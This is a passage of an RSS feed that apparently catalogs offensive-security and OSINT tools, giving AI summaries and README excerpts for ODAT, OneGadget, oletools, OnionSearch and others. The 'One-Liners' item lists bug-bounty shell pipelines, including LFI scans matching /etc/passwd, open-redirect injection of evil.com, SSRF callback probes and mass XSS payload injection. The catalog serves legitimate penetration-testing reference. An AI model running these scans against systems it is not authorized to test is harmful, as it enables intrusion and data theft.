&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; ODAT (Oracle Database Attacking Tool) is an open-source penetration testing tool designed to assess the security of Oracle databases remotely. Key features include the capability to identify valid SIDs and credentials, escalate privileges to DBA or SYSDBA, and execute system commands like reverse shells. It supports various Oracle Database versions and offers extensive options for connectivity checks and detailed database information extraction.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;table&gt;
 &lt;thead&gt;
 &lt;tr&gt;
 &lt;th&gt;&lt;strong&gt;Quentin HARDY&lt;/strong&gt;&lt;/th&gt;
 &lt;/tr&gt;
 &lt;/thead&gt;
 &lt;tbody&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;strong&gt;quentin.hardy@protonmail.com&lt;/strong&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 &lt;td&gt;&lt;strong&gt;quentin.hardy@bt.com&lt;/strong&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/tbody&gt;
&lt;/table&gt;
&lt;h1 id="odat"&gt;ODAT&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;ODAT&lt;/strong&gt; (Oracle Database Attacking Tool) is an open source &lt;strong&gt;penetration testing&lt;/strong&gt; tool that tests the security of &lt;strong&gt;Oracle Databases remotely&lt;/strong&gt;.&lt;/p&gt;</description></item><item><title>offensive-docker</title><link>https://rainmana.github.io/hackyfeed/tools/aaaguirrep-offensive-docker/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/aaaguirrep-offensive-docker/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Offensive Docker is a Docker image designed to facilitate the rapid setup of a penetration testing environment by bundling a comprehensive suite of commonly used security tools. Its primary use case is to streamline the pentesting process, featuring tools for port scanning, reconnaissance, web application testing, and brute-forcing, among others. Notably, it allows users to quickly deploy a fully equipped pentesting environment in various cloud platforms, enhancing efficiency in security assessments.&lt;/p&gt;</description></item><item><title>Offensive-OSINT-Tools</title><link>https://rainmana.github.io/hackyfeed/tools/wddadk-offensive-osint-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/wddadk-offensive-osint-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Offensive-OSINT-Tools is a curated collection of essential tools tailored for Offensive Security specialists engaged in penetration testing and red teaming. It streamlines the OSINT process by categorizing tools for various purposes, including domain investigation, email address collection, and information gathering. Notable features include the ability to efficiently search for subdomains and URLs, along with a focus on usability by providing only the most relevant tools, rather than an overwhelming list.&lt;/p&gt;</description></item><item><title>Offensive-Resources</title><link>https://rainmana.github.io/hackyfeed/tools/zeyad-azima-offensive-resources/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/zeyad-azima-offensive-resources/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Offensive-Resources V4 is a comprehensive repository designed for offensive security practitioners, providing an extensive collection of learning materials and labs across various cybersecurity domains. Its primary use case is to facilitate skill development in offensive security techniques, with notable features including a wide range of topics from exploit development to IoT and hardware hacking, structured resources for diverse platforms, and an open invitation for community contributions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="offensive-resources-v4"&gt;Offensive-Resources V4&lt;/h1&gt;
&lt;p&gt;((اللَّهُمَّ انْفَعْنِي بِمَا عَلَّمْتَنِي، وَعَلِّمْنِي مَا يَنْفَعُنِي، وَزِدْنِي عِلْمًا))&lt;/p&gt;</description></item><item><title>OffSec-Reporting</title><link>https://rainmana.github.io/hackyfeed/tools/syslifters-offsec-reporting/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/syslifters-offsec-reporting/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OffSec Reporting is a customizable platform designed for security professionals to efficiently create penetration test reports tailored for Offensive Security certifications. Built on SysReptor, it enables users to write reports in Markdown, render them as PDFs, and supports various OffSec certifications including OSCP, OSEP, and OSWP. Notable features include free accessibility, rapid report generation, and a focus on facilitating the testing process without the burden of formatting.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="offsec-reporting-using-sysreptor"&gt;OffSec Reporting using SysReptor&lt;/h1&gt;
&lt;h1 align="center"&gt;
 &lt;a href="https://docs.sysreptor.com/"&gt;&lt;img src="https://rainmana.github.io/hackyfeed/assets/Banner-SysReptor-OffSec.svg" width="100%" alt="SysReptor"&gt;&lt;/a&gt;
&lt;/h1&gt;
&lt;p align="center"&gt;
&lt;a href="https://github.com/syslifters/sysreptor/"&gt;
 &lt;img src="https://img.shields.io/github/stars/Syslifters/sysreptor?color=yellow&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://github.com/syslifters/sysreptor/releases/latest"&gt;
 &lt;img src="https://img.shields.io/github/v/release/syslifters/sysreptor?color=green&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://github.com/syslifters/sysreptor/releases/latest"&gt;
 &lt;img src="https://img.shields.io/github/release-date/syslifters/sysreptor?color=blue&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://github.com/syslifters/sysreptor/releases/latest"&gt;
 &lt;img src="https://img.shields.io/github/repo-size/syslifters/sysreptor?color=red&amp;style=flat-square"&gt;
&lt;/a&gt;
&lt;a href="https://www.linkedin.com/company/syslifters/"&gt;
 &lt;img src="https://img.shields.io/badge/-Linkedin-blue?style=flat-square&amp;logo=linkedin"&gt;
&lt;/a&gt;
&lt;a href="https://twitter.com/intent/user?screen_name=sysreptor"&gt;
 &lt;img src="https://img.shields.io/twitter/follow/sysreptor?style=social"&gt;
&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ofrak</title><link>https://rainmana.github.io/hackyfeed/tools/redballoonsecurity-ofrak/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/redballoonsecurity-ofrak/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OFRAK (Open Firmware Reverse Analysis Konsole) is a comprehensive binary analysis and modification platform designed specifically for embedded firmware and various binary formats. Its notable features include an interactive GUI for detailed exploration, a Python API for scripting reusable analyses, recursive unpacking and repacking capabilities, and integration with advanced reverse engineering tools such as angr and Ghidra, allowing users to effectively identify, analyze, and modify complex firmware.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="ofrak"&gt;OFRAK&lt;/h1&gt;
&lt;p&gt;OFRAK (Open Firmware Reverse Analysis Konsole) is a binary analysis and modification platform. OFRAK combines the ability to:&lt;/p&gt;</description></item><item><title>ohshint.gitbook.io</title><link>https://rainmana.github.io/hackyfeed/tools/ohshint-ohshint.gitbook.io/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ohshint-ohshint.gitbook.io/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OH SHINT is an informational blog focused on open-source intelligence (OSINT) and related topics, including operational security, surveillance, and counter-surveillance techniques. The blog aims to document various resources, tools, and methods for conducting OSINT investigations while sharing insights from the author&amp;rsquo;s expertise as a licensed private investigator. Notable features include comprehensive write-ups, guides, and resources that cover a wide array of intelligence-related subjects, catering to both amateurs and professionals in the field.&lt;/p&gt;</description></item><item><title>oletools</title><link>https://rainmana.github.io/hackyfeed/tools/decalage2-oletools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/decalage2-oletools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; oletools is a Python package designed for analyzing Microsoft OLE2 files, including older Microsoft Office documents, MSI files, and Outlook messages, primarily for malware detection, forensics, and debugging. Key features include the ability to detect, extract, and analyze VBA macros, OLE objects, Excel 4 macros (XLM), DDE links, and capabilities for analyzing RTF and OpenXML files. The tool is built on the olefile parser, enhancing its functionality with various detection mechanisms and logging options.&lt;/p&gt;</description></item><item><title>On-Chain-Investigations-Tools-List</title><link>https://rainmana.github.io/hackyfeed/tools/offciercia-on-chain-investigations-tools-list/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/offciercia-on-chain-investigations-tools-list/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The On-Chain Investigations Tools List is a comprehensive repository designed for conducting thorough investigations into blockchain-related activities. Its primary use case is to provide a curated compilation of tools and resources for tracking crypto hacks, security incidents, and on-chain analysis, featuring various utilities for data analysis, such as Nansen, Dune, and Metasleuth. Notable features include diverse categories of tools, a knowledge hub, and educational articles that guide users in developing effective investigative methodologies.&lt;/p&gt;</description></item><item><title>one_gadget</title><link>https://rainmana.github.io/hackyfeed/tools/david942j-one_gadget/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/david942j-one_gadget/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OneGadget is a Ruby gem designed for locating one-gadget RCE exploits within libc binaries, simplifying the process for participants in Capture The Flag (CTF) challenges. It leverages symbolic execution to efficiently identify gadgets that result in the execution of &lt;code&gt;/bin/sh&lt;/code&gt;, supports multiple architectures (i386, amd64, aarch64), and offers a command-line interface for user-friendly interaction with customizable output options.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://rubygems.org/gems/one_gadget"&gt;&lt;img src="https://img.shields.io/endpoint?url=https://gem-badge-h3lg.onrender.com/downloads/one_gadget" alt="Downloads"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://badge.fury.io/rb/one_gadget"&gt;&lt;img src="https://badge.fury.io/rb/one_gadget.svg" alt="Gem Version"&gt;&lt;/a&gt;
&lt;a href="https://github.com/david942j/one_gadget/actions"&gt;&lt;img src="https://github.com/david942j/one_gadget/workflows/build/badge.svg" alt="Build Status"&gt;&lt;/a&gt;
&lt;a href="https://qlty.sh/gh/david942j/projects/one_gadget"&gt;&lt;img src="https://qlty.sh/gh/david942j/projects/one_gadget/maintainability.svg" alt="Maintainability"&gt;&lt;/a&gt;
&lt;a href="https://qlty.sh/gh/david942j/projects/one_gadget"&gt;&lt;img src="https://qlty.sh/gh/david942j/projects/one_gadget/coverage.svg" alt="Code Coverage"&gt;&lt;/a&gt;
&lt;a href="https://inch-ci.org/github/david942j/one_gadget"&gt;&lt;img src="https://inch-ci.org/github/david942j/one_gadget.svg?branch=master" alt="Inline docs"&gt;&lt;/a&gt;
&lt;a href="https://www.rubydoc.info/github/david942j/one_gadget/"&gt;&lt;img src="http://img.shields.io/badge/yard-docs-blue.svg" alt="Yard Docs"&gt;&lt;/a&gt;
&lt;a href="http://choosealicense.com/licenses/mit/"&gt;&lt;img src="https://img.shields.io/badge/license-MIT-blue.svg" alt="MIT License"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="onegadget"&gt;OneGadget&lt;/h2&gt;
&lt;p&gt;When playing ctf pwn challenges we usually need the one-gadget RCE (remote code execution),
which leads to call &lt;code&gt;execve('/bin/sh', NULL, NULL)&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>One-Liners</title><link>https://rainmana.github.io/hackyfeed/tools/0xpugal-one-liners/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/0xpugal-one-liners/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; One-Liners is a comprehensive toolkit designed for bug bounty hunters, facilitating rapid reconnaissance and vulnerability scanning through efficient one-liner commands. It primarily focuses on subdomain enumeration, open redirect testing, LFI, SSRF, and XSS detection using various profiling tools like &lt;code&gt;subfinder&lt;/code&gt;, &lt;code&gt;dnsx&lt;/code&gt;, and &lt;code&gt;nuclei&lt;/code&gt;. Notable features include integration with multiple API sources for subdomain discovery and streamlined workflows for testing web application vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="one-liners-for-bug-bounty"&gt;One-Liners for bug bounty&lt;/h1&gt;
&lt;h6 id="thanks-to-all-who-create-these-awesome-one-liners"&gt;Thanks to all who create these Awesome One Liners❤️&lt;/h6&gt;
&lt;hr&gt;
&lt;h2 id="image"&gt;&lt;img src="https://user-images.githubusercontent.com/75373225/180003557-59bf909e-95e5-4b31-b4f8-fc05532f9f7c.png" alt="image"&gt;&lt;/h2&gt;
&lt;h2 id="one-line-recon-using-pd-tools"&gt;One Line recon using pd tools&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;subfinder -d redacted.com -all | anew subs.txt; shuffledns -d redacted.com -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt; dnsx -l subs.txt -r resolvers.txt | anew resolved.txt; naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt; httpx -l ports .txt | anew alive.txt; katana -list alive.txt -silent -nc -jc -kf all -fx -xhr -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -aff | anew urls.txt; nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt
&lt;/code&gt;&lt;/pre&gt;&lt;h1 id="subdomain-enumeration"&gt;Subdomain Enumeration&lt;/h1&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;## Juicy Subdomains
subfinder -d target.com -silent | dnsx -silent | cut -d &amp;#39; &amp;#39; -f1 | grep --color &amp;#39;api\|dev\|stg\|test\|admin\|demo\|stage\|pre\|vpn&amp;#39;

## from BufferOver.run
curl -s https://dns.bufferover.run/dns?q=.target.com | jq -r .FDNS_A[] | cut -d&amp;#39;,&amp;#39; -f2 | sort -u 

## from Riddler.io

curl -s &amp;#34;https://riddler.io/search/exportcsv?q=pld:target.com&amp;#34; | grep -Po &amp;#34;(([\w.-]*)\.([\w]*)\.([A-z]))\w+&amp;#34; | sort -u 

## from RedHunt Labs Recon API
curl --request GET --url &amp;#39;https://reconapi.redhuntlabs.com/community/v1/domains/subdomains?domain=&amp;lt;target.com&amp;gt;&amp;amp;page_size=1000&amp;#39; --header &amp;#39;X-BLOBR-KEY: API_KEY&amp;#39; | jq &amp;#39;.subdomains[]&amp;#39; -r

## from nmap
nmap --script hostmap-crtsh.nse target.com

## from CertSpotter
curl -s &amp;#34;https://api.certspotter.com/v1/issuances?domain=target.com&amp;amp;include_subdomains=true&amp;amp;expand=dns_names&amp;#34; | jq .[].dns_names | grep -Po &amp;#34;(([\w.-]*)\.([\w]*)\.([A-z]))\w+&amp;#34; | sort -u

## from Archive
curl -s &amp;#34;http://web.archive.org/cdx/search/cdx?url=*.target.com/*&amp;amp;output=text&amp;amp;fl=original&amp;amp;collapse=urlkey&amp;#34; | sed -e &amp;#39;s_https*://__&amp;#39; -e &amp;#34;s/\/.*//&amp;#34; | sort -u

## from JLDC
curl -s &amp;#34;https://jldc.me/anubis/subdomains/target.com&amp;#34; | grep -Po &amp;#34;((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+&amp;#34; | sort -u

## from crt.sh
curl -s &amp;#34;https://crt.sh/?q=%25.target.com&amp;amp;output=json&amp;#34; | jq -r &amp;#39;.[].name_value&amp;#39; | sed &amp;#39;s/\*\.//g&amp;#39; | sort -u

## from ThreatMiner
curl -s &amp;#34;https://api.threatminer.org/v2/domain.php?q=target.com&amp;amp;rt=5&amp;#34; | jq -r &amp;#39;.results[]&amp;#39; |grep -o &amp;#34;\w.*target.com&amp;#34; | sort -u

## from Anubis
curl -s &amp;#34;https://jldc.me/anubis/subdomains/target.com&amp;#34; | jq -r &amp;#39;.&amp;#39; | grep -o &amp;#34;\w.*target.com&amp;#34;

## from ThreatCrowd
curl -s &amp;#34;https://www.threatcrowd.org/searchApi/v2/domain/report/?domain=target.com&amp;#34; | jq -r &amp;#39;.subdomains&amp;#39; | grep -o &amp;#34;\w.*target.com&amp;#34;

## from HackerTarget
curl -s &amp;#34;https://api.hackertarget.com/hostsearch/?q=target.com&amp;#34;

## from AlienVault
curl -s &amp;#34;https://otx.alienvault.com/api/v1/indicators/domain/tesla.com/url_list?limit=100&amp;amp;page=1&amp;#34; | grep -o &amp;#39;&amp;#34;hostname&amp;#34;: *&amp;#34;[^&amp;#34;]*&amp;#39; | sed &amp;#39;s/&amp;#34;hostname&amp;#34;: &amp;#34;//&amp;#39; | sort -u

## from Censys
censys subdomains target.com

## from subdomain center
curl &amp;#34;https://api.subdomain.center/?domain=target.com&amp;#34; | jq -r &amp;#39;.[]&amp;#39; | sort -u
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="lfi"&gt;LFI:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat targets.txt | (gau || hakrawler || waybackurls || katana) | grep &amp;#34;=&amp;#34; | dedupe | httpx -silent -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -status-code -follow-redirects -mc 200 -mr &amp;#34;root:[x*]:0:0:&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="open-redirect"&gt;Open Redirect:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;echo target.com | (gau || hakrawler || waybackurls || katana) | grep -a -i \=http | qsreplace &amp;#39;http://evil.com&amp;#39; | while read host do;do curl -s -L $host -I | grep &amp;#34;http://evil.com&amp;#34; &amp;amp;&amp;amp; echo -e &amp;#34;$host \033[0;31mVulnerable\n&amp;#34; ;done
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat subs.txt | (gau || hakrawler || waybackurls || katana) | grep &amp;#34;=&amp;#34; | dedupe | qsreplace &amp;#39;http://example.com&amp;#39; | httpx -fr -title -match-string &amp;#39;Example Domain&amp;#39;
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="ssrf"&gt;SSRF:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat urls.txt | grep &amp;#34;=&amp;#34; | qsreplace &amp;#34;burpcollaborator_link&amp;#34; &amp;gt;&amp;gt; tmp-ssrf.txt; httpx -silent -l tmp-ssrf.txt -fr 
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="xss"&gt;XSS:&lt;/h2&gt;
&lt;h3 id="knoxss-mass-hunting"&gt;Knoxss mass hunting&lt;/h3&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;file=$1; key=&amp;#34;API_KEY&amp;#34;; while read line; do curl https://api.knoxss.pro -d target=$line -H &amp;#34;X-API-KEY: $key&amp;#34; -s | grep PoC; done &amp;lt; $file
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat domains.txt | (gau || hakrawler || waybackurls || katana) | grep -Ev &amp;#34;\.(jpeg|jpg|png|ico|gif|css|woff|svg)$&amp;#34; | uro | grep = | qsreplace &amp;#34;&amp;lt;img src=x onerror=alert(1)&amp;gt;&amp;#34; | httpx -silent -nc -mc 200 -mr &amp;#34;&amp;lt;img src=x onerror=alert(1)&amp;gt;&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat targets.txt | (gau || hakrawler || waybackurls || katana) | httpx -silent | Gxss -c 100 -p Xss | grep &amp;#34;URL&amp;#34; | cut -d &amp;#39;&amp;#34;&amp;#39; -f2 | sort -u | dalfox pipe
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;echo target.com | (gau || hakrawler || waybackurls || katana) | grep &amp;#39;=&amp;#39; |qsreplace &amp;#39;&amp;#34;&amp;gt;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;#39; | while read host do ; do curl -s --path-as-is --insecure &amp;#34;$host&amp;#34; | grep -qs &amp;#34;&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&amp;#34; &amp;amp;&amp;amp; echo &amp;#34;$host \033[0;31m&amp;#34; Vulnerable;done
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat urls.txt | grep &amp;#34;=&amp;#34; | sed &amp;#39;s/=.*/=/&amp;#39; | sed &amp;#39;s/URL: //&amp;#39; | tee testxss.txt ; dalfox file testxss.txt -b yours.xss.ht
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;cat subs.txt | awk &amp;#39;{print $3}&amp;#39;| httpx -silent | xargs -I@ sh -c &amp;#39;python3 http://xsstrike.py -u @ --crawl&amp;#39;
&lt;/code&gt;&lt;/pre&gt;&lt;hr&gt;
&lt;h2 id="hidden-dirs"&gt;Hidden Dirs:&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;dirsearch -l ips_alive --full-url --recursive --exclude-sizes=0B --random-agent -e 7z,archive,ashx,asp,aspx,back,backup,backup-sql,backup.db,backup.sql,bak,bak.zip,bakup,bin,bkp,bson,bz2,core,csv,data,dataset,db,db-backup,db-dump,db.7z,db.bz2,db.gz,db.tar,db.tar.gz,db.zip,dbs.bz2,dll,dmp,dump,dump.7z,dump.db,dump.z,dump.zip,exported,gdb,gdb.dump,gz,gzip,ib,ibd,iso,jar,java,json,jsp,jspf,jspx,ldf,log,lz,lz4,lzh,mongo,neo4j,old,pg.dump,phtm,phtml,psql,rar,rb,rdb,rdb.bz2,rdb.gz,rdb.tar,rdb.tar.gz,rdb.zip,redis,save,sde,sdf,snap,sql,sql.7z,sql.bak,sql.bz2,sql.db,sql.dump,sql.gz,sql.lz,sql.rar,sql.tar.gz,sql.tar.z,sql.xz,sql.z,sql.zip,sqlite,sqlite.bz2,sqlite.gz,sqlite.tar,sqlite.tar.gz,sqlite.zip,sqlite3,sqlitedb,swp,tar,tar.bz2,tar.gz,tar.z,temp,tml,vbk,vhd,war,xhtml,xml,xz,z,zip,conf,config,bak,backup,swp,old,db,sql,asp,aspx~,asp~,py,py~,rb~,php,php~,bkp,cache,cgi,inc,js,json,jsp~,lock,wadl -o output.txt
&lt;/code&gt;&lt;/pre&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;ffuf -c -w urls.txt:URL -w wordlist.txt:FUZZ -u URL/FUZZ -mc all -fc 500,502 -ac -recursion -v -of json -o output.json
&lt;/code&gt;&lt;/pre&gt;&lt;h2 id="ffuf-json-to-txt-output"&gt;ffuf json to txt output&lt;/h2&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;cat output.json | jq | grep -o &amp;#39;&amp;#34;url&amp;#34;: &amp;#34;http[^&amp;#34;]*&amp;#34;&amp;#39; | grep -o &amp;#39;http[^&amp;#34;]*&amp;#39; | anew out.txt
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;strong&gt;Search for Sensitive files from Wayback&lt;/strong&gt;&lt;/p&gt;</description></item><item><title>onecli</title><link>https://rainmana.github.io/hackyfeed/tools/onecli-onecli/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/onecli-onecli/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OneCLI is an open-source credential management gateway designed for AI agents, providing a secure method to store and inject API keys without exposing them to the agents themselves. It offers features such as AES-256-GCM encrypted secret storage, transparent credential injection, host and path matching for secret routing, and support for multiple agents with scoped permissions. The system enables easy setup via Docker and integrates with external vaults like Bitwarden for on-demand credential access, enhancing security and manageability in API interactions.&lt;/p&gt;</description></item><item><title>OneDorkForAll</title><link>https://rainmana.github.io/hackyfeed/tools/secshiv-onedorkforall/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secshiv-onedorkforall/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OneDorkForAll is an extensive compilation of Google dorks sourced from platforms such as Google, Shodan, and GitHub, specifically aimed at cybersecurity professionals and bug bounty hunters. It encompasses over 1 million dorks related to various vulnerabilities including LFI, SQL injection, and XSS, as well as job search techniques, and includes sensitive data reconnaissance methods for exposed configuration files, directories, and database files. Notably, it also includes dark web dorks for educational purposes, promoting responsible use of the information provided.&lt;/p&gt;</description></item><item><title>onedrive_user_enum</title><link>https://rainmana.github.io/hackyfeed/tools/nyxgeek-onedrive_user_enum/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/nyxgeek-onedrive_user_enum/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; onedrive_user_enum is a tool designed for enumerating valid OneDrive users by leveraging the HTTP response codes from file share URLs. Its primary use case is passive user enumeration, which avoids direct login attempts, making it less detectable by the target organization. Notable features include options for remote logging to MySQL, local SQLite database support, user list truncation, and mechanisms for de-duplication and user list management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="onedrive_user_enum-v210"&gt;onedrive_user_enum v2.10&lt;/h1&gt;
&lt;p&gt;enumerate valid onedrive users&lt;/p&gt;</description></item><item><title>OneListForAll</title><link>https://rainmana.github.io/hackyfeed/tools/six2dez-onelistforall/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/six2dez-onelistforall/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OneListForAll is a web fuzzing tool that generates a variety of curated wordlists for penetration testing, focusing on efficiency and organization. Its notable features include automated synchronization of multiple source repositories, categorization of wordlists into short and long versions, deduplication, and a streamlined CLI for pipeline management. The tool consolidates wordlists into manageable files, supporting broad use cases from local fuzzing to advanced vulnerability assessments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="onelistforall"&gt;OneListForAll&lt;/h1&gt;
&lt;p&gt;Wordlists for web fuzzing: curated &lt;code&gt;micro&lt;/code&gt;, categorized &lt;code&gt;short&lt;/code&gt;/&lt;code&gt;long&lt;/code&gt;, and combined final lists.&lt;/p&gt;</description></item><item><title>OnionSearch</title><link>https://rainmana.github.io/hackyfeed/tools/megadose-onionsearch/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/megadose-onionsearch/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; OnionSearch is a Python3 script designed for scraping URLs from various &amp;ldquo;.onion&amp;rdquo; search engines, facilitating access to hidden services on the Tor network. It supports multiple search engines and features options for proxy configuration, output file management, and multi-processing capabilities to enhance scraping efficiency. The tool is intended for educational use, enabling users to perform searches with customizable parameters while maintaining optimal performance.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="onionsearch"&gt;OnionSearch&lt;/h1&gt;
&lt;p&gt;👋 Hi there! For any professional inquiries or collaborations, please reach out to me at:
&lt;a href="mailto:megadose@protonmail.com"&gt;megadose@protonmail.com&lt;/a&gt;&lt;/p&gt;</description></item><item><title>open-semantic-search</title><link>https://rainmana.github.io/hackyfeed/tools/opensemanticsearch-open-semantic-search/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/opensemanticsearch-open-semantic-search/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Open Semantic Search is an integrated search server and ETL framework designed for comprehensive document processing, including crawling, text extraction, text analysis, and named entity recognition—fully supporting various search functionalities such as fulltext, faceted, exploratory, and knowledge graph searches. Notable features include Docker container support, the ability to generate search user interfaces, and extensive automated testing capabilities, enabling seamless integration and deployment. This tool is particularly valuable for organizations needing robust, customizable search solutions across diverse data types and sources.&lt;/p&gt;</description></item><item><title>Open-Source-Security-Guide</title><link>https://rainmana.github.io/hackyfeed/tools/mikeroyal-open-source-security-guide/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/mikeroyal-open-source-security-guide/</guid><description>&lt;blockquote&gt;
